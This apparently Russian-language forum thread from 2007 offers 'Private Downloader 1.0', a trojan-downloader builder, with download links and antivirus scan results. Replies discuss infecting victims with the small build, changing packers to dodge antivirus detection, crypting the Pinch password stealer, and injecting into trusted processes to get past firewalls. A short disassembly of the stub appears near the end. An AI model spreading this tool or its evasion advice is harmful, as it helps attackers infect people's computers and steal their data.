Private Downloader 1.0
http://img.secnull.info/images/330942pvtd.jpg

Private Downloader 1.0-загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере. В билдере присутствует упаковщик (FSG), сжатый билд весит около 3кб

Download | Rapidshare (http://rapidshare.com/files/33193678/Private_Downloader_1_1_.0.rar)
Download | WebFile (http://webfile.ru/1418928)
(c) SLICK

Внимание палится уже

AhnLab-V3 2007.5.24.0 05.25.2007 no virus found
AntiVir 7.4.0.27 05.25.2007 no virus found
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 05.24.2007 no virus found
AVG 7.5.0.467 05.24.2007 no virus found
BitDefender 7.2 05.25.2007 no virus found
CAT-QuickHeal 9.00 05.24.2007 (Suspicious) - DNAScan
ClamAV devel-20070416 05.25.2007 no virus found
DrWeb 4.33 05.25.2007 no virus found
eSafe 7.0.15.0 05.24.2007 suspicious Trojan/Worm
eTrust-Vet 30.7.3662 05.25.2007 no virus found
Ewido 4.0 05.24.2007 no virus found
FileAdvisor 1 05.25.2007 no virus found
Fortinet 2.85.0.0 05.25.2007 suspicious
F-Prot 4.3.2.48 05.24.2007 no virus found
F-Secure 6.70.13030.0 05.25.2007 no virus found
Ikarus T3.1.1.8 05.25.2007 no virus found
Kaspersky 4.0.2.24 05.25.2007 no virus found
McAfee 5038 05.24.2007 no virus found
Microsoft 1.2503 05.24.2007 no virus found
NOD32v2 2291 05.25.2007 no virus found
Norman 5.80.02 05.24.2007 Suspicious_F.gen
Panda 9.0.0.4 05.25.2007 no virus found
Prevx1 V2 05.25.2007 no virus found
Sophos 4.17.0 05.23.2007 Mal/Packer
Sunbelt 2.2.907.0 05.24.2007 VIPRE.Suspicious
Symantec 10 05.25.2007 no virus found
TheHacker 6.1.6.123 05.25.2007 no virus found
VBA32 3.12.0 05.25.2007 no virus found
VirusBuster 4.3.23:9 05.24.2007
Webwasher-Gateway 6.0.1 05.25.2007 Win32.Malware.gen#FSG (suspicious)

это не палится, а реакция на упакованный файл... Нормальные АВ ничего не нашли.
Просто надо использовать менее распространённый пакер/прот =)

это не палится, а реакция на упакованный файл... Нормальные АВ ничего не нашли.
Просто надо использовать менее распространённый пакер/прот =)

Пургу не гони!

чёт недогнал.Для чего эта прога? и как ей пользоваться?
Объясните каму несложно

2 motorola3653
ты отсылаешь жертве билд размером 3 кб, и он загружает на ее комп все, что угодно (*.exe?)

Пургу не гони!

Это не гон, запакуй файл фсг и проскань или приглядись к назвнаниям которые вывели АВ.
И вооще за речью следи ;)

з.ы. если не знаешь, лучше промолчи...
з.ы.ы. запаковал какой-то файл на асме фсг 2.0 и вот:


CAT-QuickHeal 9.00 05.24.2007 (Suspicious) - DNAScan
eSafe 7.0.15.0 05.24.2007 suspicious Trojan/Worm
Fortinet 2.85.0.0 05.25.2007 suspicious
Panda 9.0.0.4 05.25.2007 Suspicious file
Sophos 4.17.0 05.23.2007 Mal/Packer
Sunbelt 2.2.907.0 05.24.2007 VIPRE.Suspicious
Webwasher-Gateway 6.0.1 05.25.2007 Win32.Malware.gen#FSG (suspicious)

норм загрузчик, ещё бы с инжектом в доверенные, то цены б не было, а так фаер ловит попытку обращения в сеть за скачиваемым файлом... +

Хрен пойми ну короче сегодня точно каспер будет уже знать про него!!!

Хрен пойми ну короче сегодня точно каспер будет уже знать про него!!!
suspicious~подозрение (подозрительный) - и всё это наверно из-за паковщика...

Это не гон, запакуй файл фсг и проскань или приглядись к назвнаниям которые вывели АВ.
И вооще за речью следи ;)

з.ы. если не знаешь, лучше промолчи...
з.ы.ы. запаковал какой-то файл на асме фсг 2.0 и вот:


CAT-QuickHeal 9.00 05.24.2007 (Suspicious) - DNAScan
eSafe 7.0.15.0 05.24.2007 suspicious Trojan/Worm
Fortinet 2.85.0.0 05.25.2007 suspicious
Panda 9.0.0.4 05.25.2007 Suspicious file
Sophos 4.17.0 05.23.2007 Mal/Packer
Sunbelt 2.2.907.0 05.24.2007 VIPRE.Suspicious
Webwasher-Gateway 6.0.1 05.25.2007 Win32.Malware.gen#FSG (suspicious)


ПОХОЖЕ ТЫ ПРАВ!!!

Все он палится каспером Trojan-Downloader.Win32.Agent.brb она добавлена сегодня в 00:52

Гы. А я че то не пойму. Сделал билд. Мой трой занимает 130 кб. Запустил билд - скачало 19.6 кб и все. Никто не подскажет что это может быть?

ПС. У кого то есть еще какие то паблик лодеры? Скиньте ссылки если есть

имхо чушь, лу4ше закриптовать пинчу и так кинуть, чем кидать лоадер, который будет ка4ать трой из инета... =\ не понимаю.

Собрал тестовый билд. Посмотрел.
Стаб собран, судя по всему mingw'ом.. мне не оч понравилось.. да и познания в программировании у автора , кажется, не очень

ТАк же очень порадовало как задается флажок - выполнять файл или нет. Записываются буковки no/yes =)))) вместо того, чтобы записать 1 байт.

.text:004012CE mov [esp+28h+var_24], offset aYes_0 ; "yes"
.text:004012D6 mov [esp+28h+var_28], offset aYes ; "yes"
.text:004012DD call strcmp
.text:004012E2 test eax, eax

я плакал..